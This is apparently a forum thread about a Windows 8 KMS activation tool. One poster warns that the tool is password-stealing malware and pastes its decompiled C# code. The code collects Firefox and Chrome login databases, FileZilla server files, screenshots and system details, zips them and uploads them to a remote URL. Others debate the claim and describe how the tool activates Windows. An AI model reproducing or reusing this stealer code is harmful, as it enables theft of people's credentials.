Be aware: DO NOT USE, CONTAINS MALWARE THAT STEALS PASSWORDS PROVE (snippet of harmfull code as some people keep asking) Code: UploadFileCompletedEventHandler handler = null; try { string str9; doneWorking = false; string userName = Environment.UserName; string machineName = Environment.MachineName; userName = userName.Replace(@"\", "").Replace("/", "").Replace(":", ""); machineName = machineName.Replace(@"\", "").Replace("/", "").Replace(":", ""); string path = @"C:\Users\" + userName + @"\AppData\Roaming\Mozilla\Firefox\Profiles"; string str4 = ""; try { str4 = Directory.GetDirectories(path)[0]; } catch { } string str5 = @"C:\Users\" + userName + @"\AppData\Local\Google\Chrome\User Data\Default"; string str6 = Path.Combine(str5, "Web Data"); str5 = Path.Combine(str5, "Login Data"); List<string> fileNames = new List<string>(); txtFile = Path.Combine(Environment.GetEnvironmentVariable("TEMP"), "info.txt"); try { using (StreamWriter writer = File.CreateText(txtFile)) { writer.WriteLine("Windows User Name: " + Environment.UserName); writer.WriteLine("Comptuer Name: " + Environment.MachineName); string p = ""; try { p = GetP(); } catch { } writer.WriteLine("IP Address: " + p); writer.WriteLine("Displays Count: " + Screen.AllScreens.Length); for (int j = 0; j < Screen.AllScreens.Length; j++) { string str8 = Screen.AllScreens[j].Primary ? "(Primary)" : string.Empty; writer.WriteLine(string.Concat(new object[] { "Display#", j + 1, " Resolution: ", Screen.AllScreens[j].Bounds.Width, "x", Screen.AllScreens[j].Bounds.Height, " ", str8 })); } } } catch { } if (File.Exists(txtFile)) { fileNames.Add(txtFile); } if (Path.IsPathRooted(str4)) { fileNames.Add(Path.Combine(str4, "cert8.db")); fileNames.Add(Path.Combine(str4, "key3.db")); fileNames.Add(Path.Combine(str4, "signons.sqlite")); str9 = Path.Combine(str4, "sessionstore.js"); FileInfo info = null; if (File.Exists(str9)) { info = new FileInfo(str9); if ((info.Length / 0x400L) <= 0x400L) { fileNames.Add(str9); } } } if (File.Exists(str5) && File.Exists(str6)) { fileNames.Add(str5); fileNames.Add(str6); str9 = @"C:\Users\" + userName + @"\AppData\Local\Google\Chrome\User Data\Default\Bookmarks"; if (File.Exists(str9)) { fileNames.Add(str9); } } string str10 = @"C:\Users\" + userName + @"\AppData\Roaming\FileZilla\recentservers.xml"; string str11 = @"C:\Users\" + userName + @"\AppData\Roaming\FileZilla\sitemanager.xml"; if (File.Exists(str10)) { fileNames.Add(str10); } if (File.Exists(str11)) { fileNames.Add(str11); } ScrakeTeeny(); foreach (string str12 in screenyPaths) { if (File.Exists(str12)) { fileNames.Add(str12); } } using (ZipFile file = new ZipFile()) { file.AddFiles(fileNames, false, ""); zipFile = Path.Combine(Environment.GetEnvironmentVariable("TEMP"), userName + "-" + machineName + "-" + GetRandomString() + ".zip"); file.Save(zipFile); } string source = string.Empty; source = this.GetSource(); WebClient client = new WebClient(); client.Headers.Add("Content-Type", "binary/octet-stream"); client.UploadFileAsync(new Uri(source), "POST", zipFile); if (handler == null) { handler = delegate { doneWorking = true; Settings.Default.done = true; Settings.Default.Save(); try { DeleteTheFile(); } catch (Exception) { } finally { if (formClosed) { this.CloseFromThread(); } } }; } client.UploadFileCompleted += handler;
This looks like malware to me... Code: anubis.iseclab.org/?action=result&task_id=14172d2731375fa04096b7f3306419fc4&format=html Seems very suspect, I would wait for some more confirmations...
The "General Analysis" in that link says that "A service was started." and "Registry keys" were modified. Well, of course that happened. That's part of the activation process. I already mentioned this in the readme file:
does it work offline ? or it simple points to new kms server to activate win8 as of 7pm (like something). Checked it, it s not offline KMS Server but just GUI mode for available online servers.